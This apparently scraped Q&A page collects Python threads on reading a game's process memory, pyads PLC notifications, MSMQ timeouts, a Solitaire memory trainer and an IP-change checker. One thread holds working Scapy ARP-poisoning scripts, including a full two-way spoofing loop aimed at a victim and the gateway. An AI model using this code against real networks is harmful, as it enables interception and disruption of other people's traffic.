After trying to break down code from GitHub and find any youtube videos that talk about this I'm starting to give up, so I'm hoping one of you can please help me. All I want to be able to do is monitor a games memory addresses value. For example, let's say in the game Minecraft the health value and the memory address is:
Address: 001F6498
Value: 20
How do I turn this value into a variable in Python?
Code Thought Process:
import pywin32
pid = 5601
address = 001F6498
ReadProcessMemory(pid, address):
print(Value)
#In this example i would like it to print 20
You need to get a handle to the process first. Here is some code that does so using OpenProcess() FindWindow() and GetWindowThreadProcessId() to get the handle to the process. Also included is a little function to properly read the correct size variable and store it correctly. This method can be used to read pointers, utilizing "i" to denote an integer type.
import win32api
import win32gui
import win32process
from ctypes import *
from pymem import *
PROCESS_ALL_ACCESS = 0x1F0FFF
ReadProcessMemory = windll.kernel32.ReadProcessMemory
def read_memory(procId, address, type):
buffer = (ctypes.c_byte * getlenght(type))()
bytesRead = ctypes.c_ulonglong(0)
readlenght = getlenght(type)
ReadProcessMemory(procId, address, buffer, readlenght, byref(bytesRead))
return struct.unpack(type, buffer)[0]
hWnd = win32gui.FindWindow(0, ("WINDOW NAME HERE"))
pid=win32process.GetWindowThreadProcessId(hWnd)
handle = pymem.Pymem()
handle.open_process_from_id(pid[1])
procBaseAddress = handle.process_base
hProc = windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, 0, pid[1])
value = ReadProcessMemory(hProc, ADDRESS_OF_VARIABLE_TO_READ, "i")
print(value)
Credits to a friend, puppetmaster, who taught me how to do this
Related
I am working on a project with TwinCat and AMR. I'm using Python as a communication medium between the two systems. I have an issue with waiting for the variable to change value. I have a variable of type BOOL and want to perform a certain action when the variable changes. Can someone help me with this?
P.S. I have notified for change in variable as well.
import pyads
PLC = pyads.Connection('127.0.0.1.1.1', pyads.PORT_SPS1)
PLC.open()
StnF = PLC.read_by_name('GVL.AGVgotoStnF', pyads.PLCTYPE_BOOL)
print(StnF)
if StnF == 'TRUE' :
ArrStnF = PLC.write_by_name('GVL.iPosAGV',3,pyads.PLCTYPE_INT)
print(ArrStnF)
Your looking for notifications. The documentation of pyads gives and example how to do this:
import pyads
from ctypes import sizeof
# define the callback which extracts the value of the variable
def callback(notification, data):
contents = notification.contents
var = next(map(int, bytearray(contents.data)[0:contents.cbSampleSize]))
plc = pyads.Connection('127.0.0.1.1.1', pyads.PORT_SPS1)
plc.open()
attr = pyads.NotificationAttrib(sizeof(pyads.PLCTYPE_INT))
# add_device_notification returns a tuple of notification_handle and
# user_handle which we just store in handles
handles = plc.add_device_notification('GVL.integer_value', attr, callback)
# To remove the device notification just use the del_device_notication
# function.
plc.del_device_notification(*handles)
I've lately been trying to build a "Man in The Middle" using Python and Scapy (for my own practice, no malicious purposes).
I started off with writing code to create a dos, however for some reason it's acting strangely.
First of all, for some reason, when I run it on my Windows PC, the arp entry never changes. I've even gone as far as clearing the arp table (arp -d *), yet still the real mac address of the gateway returns.
Secondly, the code seems to work on my phone only partially - when opening websites, it just takes a long while. Also some websites seem unaffected (Instagram works...).
Also, running the code against different brands of phones resulted in different results.
Could it be that there are security measures on the different devices? Did I do something wrong?
Here is the code, thanks for the help!
from enum import Enum
import getmac
import netifaces
from scapy.all import ARP, Ether, sendp
class DeviceIps(Enum):
MyPhone = '192.168.1.27'
MyPc = '192.168.1.70'
class Device(object):
def __init__(self, ip: str):
self.ip = ip
def get_mac_from_ip(ip=None):
return getmac.get_mac_address(ip=ip)
def build_poison_packet(victim_ip):
ARP_RESPONSE_CODE = 0x2
FAKE_MAC_ADDRESS = 'aa:bb:cc:dd:ee:ff'
gateway_ip_address = netifaces.gateways()['default'][netifaces.AF_INET][0]
victim_mac_address = get_mac_from_ip(victim_ip)
poison_packet = Ether(src=FAKE_MAC_ADDRESS, dst=victim_mac_address) \
/ ARP(psrc=gateway_ip_address, # -> Address to lie about
hwsrc=FAKE_MAC_ADDRESS, # -> Mac address to direct to
hwdst=victim_mac_address, pdst=victim_ip, op=ARP_RESPONSE_CODE)
return poison_packet
def poison(target: Device):
poison_packet = build_poison_packet(target.ip)
print(poison_packet.show())
while True:
sendp(poison_packet)
def main():
poison(Device(DeviceIps.MyPc.value))
main()
Here's simple scapy code that send arp reply to victim and host (gateway) address.
You can clean up the both victim and host arp table before your script is terminated.
#!/bin/env python
from scapy.all import Ether, ARP, sendp
import time
victim_hw_addr = "34:e1:2d:83:20:aa"
victim_ip_addr = "192.168.43.152"
gw_hw_addr = "ce:9f:7a:7b:d7:aa"
gw_ip_addr = "192.168.43.1"
my_hw_addr = "8c:85:90:c3:0b:aa"
tmout = 100
arp4victim = Ether(dst=victim_hw_addr, src=my_hw_addr) / ARP(pdst=victim_ip_addr, hwdst=victim_hw_addr, psrc=gw_ip_addr, hwsrc=my_hw_addr, op=2)
arp4gw = Ether(dst=gw_hw_addr, src=my_hw_addr) / ARP(pdst=gw_ip_addr, hwdst=gw_hw_addr, psrc=victim_ip_addr, hwsrc=my_hw_addr, op=2)
while True:
sendp(arp4victim)
sendp(arp4gw)
time.sleep(3)
print "*"
For starters, I would like to say if anyone can help here, you are incredible.
General Question
My Python program needs to interact with MSMQ. Basically, I want to peek at a queue, specifying a timeout if there's nothing in the queue.
However, despite my best efforts, I cannot get Peek() to wait out the timeout interval, when there's no value previously in the queue. Can you please point out what is missing from this code?
My Current Code
Here is my code right now:
from socket import gethostname
import win32com.client
import pythoncom
import clr
clr.AddReference("System")
clr.AddReference("System.Messaging")
from System import TimeSpan
from System.Messaging import MessageQueue
# Source: [1]
# [1] https://learn.microsoft.com/en-us/previous-versions/windows/desktop/msmq/ms707027%28v%3dvs.85%29
MQ_DENY_NONE = 0x0
MQ_PEEK_ACCESS = 0x1
MQ_SEND_ACCESS = 0x2
# Set up queue
pythoncom.CoInitialize()
qinfo = win32com.client.Dispatch("MSMQ.MSMQQueueInfo")
qinfo.FormatName = f"direct=os:{gethostname()}\\PRIVATE$\\MyQueue"
queue = qinfo.Open(MQ_PEEK_ACCESS, MQ_DENY_NONE)
# Receive a value
timeout_sec = 1.0
timespan = TimeSpan.FromSeconds(timeout_sec)
label, body = "", ""
# TODO: timeout value does not appear working. It never waits when
# there's no message
if queue.Peek(pythoncom.Empty, pythoncom.Empty, timespan):
msg = queue.Receive() . # Blocking receive --> remove msg from the queue
if msg is not None:
label = msg.Label
body = msg.Body
I run: inspect.getfullargspec(queue.Peek) and get:
FullArgSpec(args=['self', 'WantDestinationQueue', 'WantBody', 'ReceiveTimeout', 'WantConnectorType'], varargs=None, varkw=None, defaults=(<PyOleMissing object at 0x00000147F5D43BD0>, <PyOleMissing object at 0x00000147F5D43BD0>, <PyOleMissing object at 0x00000147F5D43BD0>, <PyOleMissing object at 0x00000147F5D43BD0>), kwonlyargs=[], kwonlydefaults=None, annotations={})
Things I've Tried
This question: saying ReceiveTimeout=timespan doesn't seem to solve my problem.
Replacing pythoncom.Empty with pythoncom.Missing doesn't seem to work
This unanswered question seems very similar to mine
I found this article sending-msmq-messages-python
The article shows you how to send and receive a message using msmq. I don't understand why you can't just standard socket connection syntax to say if I haven't received a packet/connection then close connection
import select
mysocket.setblocking(0)
ready = select.select([mysocket], [], [], timeout_in_seconds)
if ready[0]:
data = mysocket.recv(4096)
So something like that shouldn't be too difficult. Worst case scenario create a thread that checks every timeout_time if a variable is zero or not. If it's zero close queue nothing received if it's >0 set to zero and wait for more messages.
I also found a GitHub about asynchronous msmq for python logging.
asynchronous msmq
This one just said receive while True
dlopes7 msmq
import time
t_end = time.time() + 60 * 15
messages=0
while time.time() < t_end or messages>0:
msg = queue.Receive()
messages+=1
if(time.time() > t_end and messages>0):
messages=0
t_end = time.time() + 60 * 15
print(f'Got Message from {queue_name}: {msg.Label} - {msg.Body}')
Not the answer you wanted but one that will work.
In the original question's comments, #PeterBrittain suggested to try just using:
an integer (in milliseconds) for their timeout
I got around to trying that out, and actually, it worked! I found float values to work as well. Here is some sample Python code:
timeout_sec = 1.0
queue.Peek(pythoncom.Empty, pythoncom.Empty, timeout_sec * 1000):
Thank you #PeterBrittain!
im working on a little solitär trainer. I don't know why the function ReadProcessMemory doesn't work. Normally it returns a False or True but in that case nothing. The GetlastError() gives me the Errorcode 6.
#-*- coding: cp1252 -*-
import ctypes, win32ui, win32process ,win32api
PROCESS_ALL_ACCESS = 0x1F0FFF
HWND = win32ui.FindWindow(None,"Solitär").GetSafeHwnd()
print(HWND)
PID = win32process.GetWindowThreadProcessId(HWND)[1]
print(PID)
PROCESS = win32api.OpenProcess(PROCESS_ALL_ACCESS,0,PID).handle
rPM = ctypes.windll.kernel32.ReadProcessMemory
wPM = ctypes.windll.kernel32.WriteProcessMemory
ADDRESS1 = 0x00E97074
ADDRESS2 = ctypes.create_string_buffer(64)
pi = ctypes.pointer(ADDRESS2)
rPM(PROCESS,ADDRESS1,ADDRESS2,64,0)
print(ADDRESS2)
x=ctypes.windll.kernel32.GetLastError()
print(x)
Check the community comment to the MSDN ReadProcessMemory page, quote(sic):
W7 wont run read process memory
You may need to check your access permissions for "SE_DEBUG_NAME" for the current processes token. If not enabled. Enabled it. This must be done as administrator of course.
Also fully declare the return types and use the use_last_error parameter, where ctypes will cache the GetLastError() value internally directly after the call. Otherwise, it may be incorrect. If you are on a 64-bit system, SIZE_T and pointers are 64-bit values so ctypes needs to know the types to set up the stack correctly for the call.
...
from ctypes import wintypes
...
rPM = ctypes.WinDLL('kernel32',use_last_error=True).ReadProcessMemory
rPM.argtypes = [wintypes.HANDLE,wintypes.LPCVOID,wintypes.LPVOID,ctypes.c_size_t,ctypes.POINTER(ctypes.c_size_t)]
rPM.restype = wintypes.BOOL
wPM = ctypes.WinDLL('kernel32',use_last_error=True).WriteProcessMemory
wPM.argtypes = [wintypes.HANDLE,wintypes.LPVOID,wintypes.LPCVOID,ctypes.c_size_t,ctypes.POINTER(ctypes.c_size_t)]
wPM.restype = wintypes.BOOL
ADDRESS1 = 0x00E97074
ADDRESS2 = ctypes.create_string_buffer(64)
bytes_read = ctypes.c_size_t()
print(rPM(PROCESS,ADDRESS1,ADDRESS2,64,ctypes.byref(bytes_read)))
print(ctypes.get_last_error())
Also, FYI, even with all the fixes I get the same error value, but I didn't go through the trouble of enabling SE_DEBUG_NAME.
SOLVED
The following line is the issue:
PROCESS = win32api.OpenProcess(PROCESS_ALL_ACCESS,0,PID).handle
win32api.OpenProcess returns a temporary PyHANDLE that gets destroyed and closes the handle after the handle is retrieved.
The solution is to use:
PROCESS = win32api.OpenProcess(PROCESS_ALL_ACCESS,0,PID)
...
rPM(PROCESS.handle,ADDRESS1,ADDRESS2,64,0)
PROCESS then holds the PyHANDLE object and the handle remains valid.
I have just learned the basics of Python, and I am trying to make a few projects so that I can increase my knowledge of the programming language.
Since I am rather paranoid, I created a script that uses PycURL to fetch my current IP address every x seconds, for VPN security. Here is my code[EDITED]:
import requests
enterIP = str(input("What is your current IP address?"))
def getIP():
while True:
try:
result = requests.get("http://ipinfo.io/ip")
print(result.text)
except KeyboardInterrupt:
print("\nProccess terminated by user")
return result.text
def checkIP():
while True:
if enterIP == result.text:
pass
else:
print("IP has changed!")
getIP()
checkIP()
Now I would like to expand the idea, so that the script asks the user to enter their current IP, saves that octet as a string, then uses a loop to keep running it against the PycURL function to make sure that their IP hasn't changed? The only problem is that I am completely stumped, I cannot come up with a function that would take the output of PycURL and compare it to a string. How could I achieve that?
As #holdenweb explained, you do not need pycurl for such a simple task, but nevertheless, here is a working example:
import pycurl
import time
from StringIO import StringIO
def get_ip():
buffer = StringIO()
c = pycurl.Curl()
c.setopt(pycurl.URL, "http://ipinfo.io/ip")
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()
return buffer.getvalue()
def main():
initial = get_ip()
print 'Initial IP: %s' % initial
try:
while True:
current = get_ip()
if current != initial:
print 'IP has changed to: %s' % current
time.sleep(300)
except KeyboardInterrupt:
print("\nProccess terminated by user")
if __name__ == '__main__':
main()
As you can see I moved the logic of getting the IP to separate function: get_ip and added few missing things, like catching the buffer to a string and returning it. Otherwise it is pretty much the same as the first example in pycurl quickstart
The main function is called below, when the script is accessed directly (not by import).
First off it calls the get_ip to get initial IP and then runs the while loop which checks if the IP has changed and lets you know if so.
EDIT:
Since you changed your question, here is your new code in a working example:
import requests
def getIP():
result = requests.get("http://ipinfo.io/ip")
return result.text
def checkIP():
initial = getIP()
print("Initial IP: {}".format(initial))
while True:
current = getIP()
if initial == current:
pass
else:
print("IP has changed!")
checkIP()
As I mentioned in the comments above, you do not need two loops. One is enough. You don't even need two functions, but better do. One for getting the data and one for the loop. In the later, first get initial value and then run the loop, inside which you check if value has changed or not.
It seems, from reading the pycurl documentation, like you would find it easier to solve this problem using the requests library. Curl is more to do with file transfer, so the library expects you to provide a file-like object into which it writes the contents. This would greatly complicate your logic.
requests allows you to access the text of the server's response directly:
>>> import requests
>>> result = requests.get("http://ipinfo.io/ip")
>>> result.text
'151.231.192.8\n'
As #PeterWood suggested, a function would be more appropriate than a class for this - or if the script is going to run continuously, just a simple loop as the body of the program.